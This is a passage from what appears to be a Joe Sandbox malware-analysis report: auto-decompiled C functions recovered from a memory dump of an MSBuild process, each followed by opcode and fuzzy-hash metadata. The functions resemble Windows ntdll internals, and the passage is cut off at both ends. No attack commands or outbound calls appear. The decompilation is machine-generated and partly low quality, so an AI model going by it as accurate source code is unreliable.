                                            					E010D165E(__ebx, 0x10f8ae4, (__edx -  *0x10f8b04 >> 0x14) + (__edx -  *0x10f8b04 >> 0x14), __edi, __ecx, (__edx -  *0x10f8b04 >> 0x14) + (__edx -  *0x10f8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                            				}
                                            				E010CAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                            				if(E01027D50() == 0) {
                                            					_t16 = 0x7ffe0388;
                                            				} else {
                                            					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            				}
                                            				if( *_t16 != 0) {
                                            					_t16 = E010BFE3F(_t22, _t35, _v8, _v12);
                                            				}
                                            				return _t16;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6b99e989888a786b3e4de7d72f910c624d7561e79c8bf909b9bb81deac3533a
                                            • Instruction ID: e231c7863a547ed4e8eb5faa2c3b029a8811fac9b6a3db18edaf083801eb8654
                                            • Opcode Fuzzy Hash: e6b99e989888a786b3e4de7d72f910c624d7561e79c8bf909b9bb81deac3533a
                                            • Instruction Fuzzy Hash: CB0147726047469FD751EF68C940B9A7BE5ABD4310F04CA29F9C583690EE70D841CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E010BFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				signed int _v12;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				short _v58;
                                            				char _v64;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char* _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            				signed int _t32;
                                            
                                            				_t29 = __edx;
                                            				_t24 = __ebx;
                                            				_v12 =  *0x10fd360 ^ _t32;
                                            				_t30 = __edx;
                                            				_t31 = __ecx;
                                            				E0104FA60( &_v64, 0, 0x30);
                                            				_v24 = _a4;
                                            				_v32 = _t31;
                                            				_v28 = _t30;
                                            				_v58 = 0x267;
                                            				if(E01027D50() == 0) {
                                            					_t18 = 0x7ffe0388;
                                            				} else {
                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            				}
                                            				_push( &_v64);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t18 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c6379823feb9f293ca6c33b148faf5c5b702344a9172a2bfbb7dc3d442ee2fa
                                            • Instruction ID: 16f1fc10f2c69ac636e02184879e8ffe96170a12768cdcdb438db1c2b1669d43
                                            • Opcode Fuzzy Hash: 6c6379823feb9f293ca6c33b148faf5c5b702344a9172a2bfbb7dc3d442ee2fa
                                            • Instruction Fuzzy Hash: BC018471A00219ABDB14DFA9D845FEEBBB8EF54700F004066F940EB281DA74D911C794
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E010BFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				signed int _v12;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				short _v58;
                                            				char _v64;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char* _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            				signed int _t32;
                                            
                                            				_t29 = __edx;
                                            				_t24 = __ebx;
                                            				_v12 =  *0x10fd360 ^ _t32;
                                            				_t30 = __edx;
                                            				_t31 = __ecx;
                                            				E0104FA60( &_v64, 0, 0x30);
                                            				_v24 = _a4;
                                            				_v32 = _t31;
                                            				_v28 = _t30;
                                            				_v58 = 0x266;
                                            				if(E01027D50() == 0) {
                                            					_t18 = 0x7ffe0388;
                                            				} else {
                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            				}
                                            				_push( &_v64);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t18 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8e121c1ba5c88664f228cdc854be3a11c02abdaee02ca290fd806e4b7c9c04f0
                                            • Instruction ID: 1cccb2dbb6e5933126ce1a2218011fc53e47c8f02873861e3717af3abaeb7fa4
                                            • Opcode Fuzzy Hash: 8e121c1ba5c88664f228cdc854be3a11c02abdaee02ca290fd806e4b7c9c04f0
                                            • Instruction Fuzzy Hash: F7018471A0021AABDB14DBA9D885FEFBBB8EF54700F404066F940EB280DA74DA11C7D4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 54%
                                            			E010D8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                            				signed int _v12;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				intOrPtr _v40;
                                            				short _v66;
                                            				char _v72;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char* _t18;
                                            				signed int _t32;
                                            
                                            				_t29 = __edx;
                                            				_v12 =  *0x10fd360 ^ _t32;
                                            				_t31 = _a8;
                                            				_t30 = _a12;
                                            				_v66 = 0x1c20;
                                            				_v40 = __ecx;
                                            				_v36 = __edx;
                                            				_v32 = _a4;
                                            				_v28 = _a8;
                                            				_v24 = _a12;
                                            				if(E01027D50() == 0) {
                                            					_t18 = 0x7ffe0386;
                                            				} else {
                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v72);
                                            				_push(0x14);
                                            				_push(0x20402);
                                            				_push( *_t18 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3368a0092f2b04bb1e4dbe9ffce6c08ccf81431d2a7356bd5a0d74c275c0305f
                                            • Instruction ID: cb4306f2ee89416489911674623e8a393d0c59585ec36b374cd99da2a4321447
                                            • Opcode Fuzzy Hash: 3368a0092f2b04bb1e4dbe9ffce6c08ccf81431d2a7356bd5a0d74c275c0305f
                                            • Instruction Fuzzy Hash: BE012CB1A0021DAFDB00DFA9D9819EEBBB8EF58310F50406AFA44E7341D634A900CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 54%
                                            			E010D8ED6(intOrPtr __ecx, intOrPtr __edx) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				short _v62;
                                            				char _v68;
                                            				signed char* _t29;
                                            				intOrPtr _t35;
                                            				intOrPtr _t41;
                                            				intOrPtr _t42;
                                            				signed int _t43;
                                            
                                            				_t40 = __edx;
                                            				_v8 =  *0x10fd360 ^ _t43;
                                            				_v28 = __ecx;
                                            				_v62 = 0x1c2a;
                                            				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                            				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                            				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                            				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                            				_v24 = __edx;
                                            				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                            				if(E01027D50() == 0) {
                                            					_t29 = 0x7ffe0386;
                                            				} else {
                                            					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v68);
                                            				_push(0x1c);
                                            				_push(0x20402);
                                            				_push( *_t29 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                            			}



















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e4cbd2111b64ae3d767e65282733cc2dcefb89eb82cb98e743525913c68752c
                                            • Instruction ID: b89f4661d70d54c684461694b1032b512c78d6f584c06297403431905a419118
                                            • Opcode Fuzzy Hash: 1e4cbd2111b64ae3d767e65282733cc2dcefb89eb82cb98e743525913c68752c
                                            • Instruction Fuzzy Hash: A7111E70A002199FDB04DFA9D441BAEBBF4FF08300F0482BAE558EB782E634D940CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0100DB60(signed int __ecx) {
                                            				intOrPtr* _t9;
                                            				void* _t12;
                                            				void* _t13;
                                            				intOrPtr _t14;
                                            
                                            				_t9 = __ecx;
                                            				_t14 = 0;
                                            				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                            					_t13 = 0xc000000d;
                                            				} else {
                                            					_t14 = E0100DB40();
                                            					if(_t14 == 0) {
                                            						_t13 = 0xc0000017;
                                            					} else {
                                            						_t13 = E0100E7B0(__ecx, _t12, _t14, 0xfff);
                                            						if(_t13 < 0) {
                                            							L0100E8B0(__ecx, _t14, 0xfff);
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                            							_t14 = 0;
                                            						} else {
                                            							_t13 = 0;
                                            							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                            						}
                                            					}
                                            				}
                                            				 *_t9 = _t14;
                                            				return _t13;
                                            			}








                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                            • Instruction ID: 57197f5b0ef00b9658327d33e8704540344eec1c81c4775da2011a6b0bd7e366
                                            • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                            • Instruction Fuzzy Hash: 4CF06833241923DBF7336AD98894B5BB6959F91A60F150475F3859B6C4CA60880297F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0100B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                            				signed char* _t13;
                                            				intOrPtr _t22;
                                            				char _t23;
                                            
                                            				_t23 = __edx;
                                            				_t22 = __ecx;
                                            				if(E01027D50() != 0) {
                                            					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                            				} else {
                                            					_t13 = 0x7ffe0384;
                                            				}
                                            				if( *_t13 != 0) {
                                            					_t13 =  *[fs:0x30];
                                            					if((_t13[0x240] & 0x00000004) == 0) {
                                            						goto L3;
                                            					}
                                            					if(E01027D50() == 0) {
                                            						_t13 = 0x7ffe0385;
                                            					} else {
                                            						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                            					}
                                            					if(( *_t13 & 0x00000020) == 0) {
                                            						goto L3;
                                            					}
                                            					return E01087016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                            				} else {
                                            					L3:
                                            					return _t13;
                                            				}
                                            			}







                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                            • Instruction ID: 84ebb8d54da129d72a61f403f0d166c8880615ae7f9593c30211a23b2e6387d5
                                            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                            • Instruction Fuzzy Hash: 70018136200680ABE323A75DC804FAE7BD9EF51754F4940A1FA94CB6B2D679D800C625
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 46%
                                            			E0109FE87(intOrPtr __ecx) {
                                            				signed int _v8;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				signed int _v24;
                                            				intOrPtr _v28;
                                            				short _v54;
                                            				char _v60;
                                            				signed char* _t21;
                                            				intOrPtr _t27;
                                            				intOrPtr _t32;
                                            				intOrPtr _t33;
                                            				intOrPtr _t34;
                                            				signed int _t35;
                                            
                                            				_v8 =  *0x10fd360 ^ _t35;
                                            				_v16 = __ecx;
                                            				_v54 = 0x1722;
                                            				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                            				_v28 =  *((intOrPtr*)(__ecx + 4));
                                            				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                            				if(E01027D50() == 0) {
                                            					_t21 = 0x7ffe0382;
                                            				} else {
                                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                            				}
                                            				_push( &_v60);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t21 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                            			}

















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 244f1d9bb41d8c01415464804708ef92aae9f1d7ccecfa19cc935199449a5217
                                            • Instruction ID: 3007867adf181dcf4172ebeea457e0119ddd9d9b515e8304e380ca7392843ed1
                                            • Opcode Fuzzy Hash: 244f1d9bb41d8c01415464804708ef92aae9f1d7ccecfa19cc935199449a5217
                                            • Instruction Fuzzy Hash: FA016270A00209AFCB14DFA8D542AAEBBF4EF18704F5041A9A544DB382D635D901CB80
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 48%
                                            			E010C131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				short _v50;
                                            				char _v56;
                                            				signed char* _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            				signed int _t32;
                                            
                                            				_t29 = __edx;
                                            				_v8 =  *0x10fd360 ^ _t32;
                                            				_v20 = _a4;
                                            				_v12 = _a8;
                                            				_v24 = __ecx;
                                            				_v16 = __edx;
                                            				_v50 = 0x1021;
                                            				if(E01027D50() == 0) {
                                            					_t18 = 0x7ffe0380;
                                            				} else {
                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            				}
                                            				_push( &_v56);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t18 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                            			}
















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 55ba7206dcd73bbd75b8aa32dc6ba2e86253d27f5471058ec0228cd5f5328c80
                                            • Instruction ID: 104573b5675f757458658a4cb31028ce1b0cbd8ca444b4d5750e8c0cf6ed3594
                                            • Opcode Fuzzy Hash: 55ba7206dcd73bbd75b8aa32dc6ba2e86253d27f5471058ec0228cd5f5328c80
                                            • Instruction Fuzzy Hash: A9013CB1A01209EFCB04EFA9D545AAEB7F4FF18700F408069F985EB381E634DA00CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 48%
                                            			E010D8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				short _v50;
                                            				char _v56;
                                            				signed char* _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            				signed int _t32;
                                            
                                            				_t29 = __edx;
                                            				_v8 =  *0x10fd360 ^ _t32;
                                            				_v16 = __ecx;
                                            				_v50 = 0x1c2c;
                                            				_v24 = _a4;
                                            				_v20 = _a8;
                                            				_v12 = __edx;
                                            				if(E01027D50() == 0) {
                                            					_t18 = 0x7ffe0386;
                                            				} else {
                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v56);
                                            				_push(0x10);
                                            				_push(0x402);
                                            				_push( *_t18 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                            			}
















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba699cd055264387887c47be15e4819981d7f02b80c3f3edc7165273ddf38515
                                            • Instruction ID: d55d6e920cd6abe68f260aeaccc9bcbcea5818af25ea6484bef58a4579485c20
                                            • Opcode Fuzzy Hash: ba699cd055264387887c47be15e4819981d7f02b80c3f3edc7165273ddf38515
                                            • Instruction Fuzzy Hash: 6C01497490020DAFDB00DFB8D545A9EB7F4EF18300F508069F945EB341D634DA00CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 46%
                                            			E010C1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				short _v46;
                                            				char _v52;
                                            				signed char* _t15;
                                            				intOrPtr _t21;
                                            				intOrPtr _t27;
                                            				intOrPtr _t28;
                                            				signed int _t29;
                                            
                                            				_t26 = __edx;
                                            				_v8 =  *0x10fd360 ^ _t29;
                                            				_v12 = _a4;
                                            				_v20 = __ecx;
                                            				_v16 = __edx;
                                            				_v46 = 0x1024;
                                            				if(E01027D50() == 0) {
                                            					_t15 = 0x7ffe0380;
                                            				} else {
                                            					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            				}
                                            				_push( &_v52);
                                            				_push(0xc);
                                            				_push(0x20402);
                                            				_push( *_t15 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                            			}















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7512303026c236dff6d2b63b0047a2cb3a7bd5294d8fd79759ec0e1da4015444
                                            • Instruction ID: 3d110e1428bd590a60d4ef9efa0226b63f11de2c99babbdf42d0f201e77d657f
                                            • Opcode Fuzzy Hash: 7512303026c236dff6d2b63b0047a2cb3a7bd5294d8fd79759ec0e1da4015444
                                            • Instruction Fuzzy Hash: 7BF06DB1A00258EFDB14EFA8D445EAEBBF4EF18700F4440A9E945EB381EA34D900CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0102C577(void* __ecx, char _a4) {
                                            				void* __esi;
                                            				void* __ebp;
                                            				void* _t17;
                                            				void* _t19;
                                            				void* _t20;
                                            				void* _t21;
                                            
                                            				_t18 = __ecx;
                                            				_t21 = __ecx;
                                            				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0102C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xfe11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                            					__eflags = _a4;
                                            					if(__eflags != 0) {
                                            						L10:
                                            						E010D88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                            						L9:
                                            						return 0;
                                            					}
                                            					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                            					if(__eflags == 0) {
                                            						goto L10;
                                            					}
                                            					goto L9;
                                            				} else {
                                            					return 1;
                                            				}
                                            			}










                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e47b35f4769a02947e1d65b67777c5cbcafa07210d1337e546192ba88ad8f470
                                            • Instruction ID: d1c7483b44465fa56819f9ecb88bf5822629934cf386a2ba95c499952982d4e6
                                            • Opcode Fuzzy Hash: e47b35f4769a02947e1d65b67777c5cbcafa07210d1337e546192ba88ad8f470
                                            • Instruction Fuzzy Hash: 80F09AB29157B09EF7B6872C8204B6A7FE8AB05678F5884A7E58687206C6A4DCC0C251
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E010C2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                            				void* __esi;
                                            				signed char _t3;
                                            				signed char _t7;
                                            				void* _t19;
                                            
                                            				_t17 = __ecx;
                                            				_t3 = E010BFD22(__ecx);
                                            				_t19 =  *0x10f849c - _t3; // 0x73dcf66d
                                            				if(_t19 == 0) {
                                            					__eflags = _t17 -  *0x10f8748; // 0x0
                                            					if(__eflags <= 0) {
                                            						E010C1C06();
                                            						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                            						__eflags = _t3;
                                            						if(_t3 != 0) {
                                            							L5:
                                            							__eflags =  *0x10f8724 & 0x00000004;
                                            							if(( *0x10f8724 & 0x00000004) == 0) {
                                            								asm("int3");
                                            								return _t3;
                                            							}
                                            						} else {
                                            							_t3 =  *0x7ffe02d4 & 0x00000003;
                                            							__eflags = _t3 - 3;
                                            							if(_t3 == 3) {
                                            								goto L5;
                                            							}
                                            						}
                                            					}
                                            					return _t3;
                                            				} else {
                                            					_t7 =  *0x10f8724; // 0x0
                                            					return E010B8DF1(__ebx, 0xc0000374, 0x10f5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                            				}
                                            			}








                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d3770eb8ead42d46ce43490c17e671e41e9da2cc7eab7d89e3b66c36dbabf2b
                                            • Instruction ID: a52b248aa43d56699ae65a9fdb4821096bdd008d3b8ea7614d25f467d144a306
                                            • Opcode Fuzzy Hash: 8d3770eb8ead42d46ce43490c17e671e41e9da2cc7eab7d89e3b66c36dbabf2b
                                            • Instruction Fuzzy Hash: EAF0203A4112858ADF72AB2864023EA2FD2E755A10F2940CFE5D017E0BC83AC883CF20
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 54%
                                            			E0104927A(void* __ecx) {
                                            				signed int _t11;
                                            				void* _t14;
                                            
                                            				_t11 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                            				if(_t11 != 0) {
                                            					E0104FA60(_t11, 0, 0x98);
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                            					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                            					E010492C6(_t11, _t14);
                                            				}
                                            				return _t11;
                                            			}






                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                            • Instruction ID: d58669fbfa1f1e10373cc07339ac2628f94badfceb286bce47aac7caa3dbee20
                                            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                            • Instruction Fuzzy Hash: 4DE022B23406016BE7219E0ACCC4F8737ADEF96724F044078F9005E282CAE6DD0887A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 43%
                                            			E010D8D34(intOrPtr __ecx, intOrPtr __edx) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				short _v42;
                                            				char _v48;
                                            				signed char* _t12;
                                            				intOrPtr _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr _t25;
                                            				signed int _t26;
                                            
                                            				_t23 = __edx;
                                            				_v8 =  *0x10fd360 ^ _t26;
                                            				_v16 = __ecx;
                                            				_v42 = 0x1c2b;
                                            				_v12 = __edx;
                                            				if(E01027D50() == 0) {
                                            					_t12 = 0x7ffe0386;
                                            				} else {
                                            					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v48);
                                            				_push(8);
                                            				_push(0x20402);
                                            				_push( *_t12 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                            			}














                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 507087268526a08aa2f205739980382e7ce396dd0823c8a051654338e2bb18d4
                                            • Instruction ID: 66d0ccbc1bf22f270e579d02399ebad165f560e30760f5560df8b74965b6f760
                                            • Opcode Fuzzy Hash: 507087268526a08aa2f205739980382e7ce396dd0823c8a051654338e2bb18d4
                                            • Instruction Fuzzy Hash: 81F05470A4470DAFDB14EFB8D546BAE77B4EF18700F5080A9E945EB291EA34D900C754
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 36%
                                            			E010D8B58(intOrPtr __ecx) {
                                            				signed int _v8;
                                            				intOrPtr _v20;
                                            				short _v46;
                                            				char _v52;
                                            				signed char* _t11;
                                            				intOrPtr _t17;
                                            				intOrPtr _t22;
                                            				intOrPtr _t23;
                                            				intOrPtr _t24;
                                            				signed int _t25;
                                            
                                            				_v8 =  *0x10fd360 ^ _t25;
                                            				_v20 = __ecx;
                                            				_v46 = 0x1c26;
                                            				if(E01027D50() == 0) {
                                            					_t11 = 0x7ffe0386;
                                            				} else {
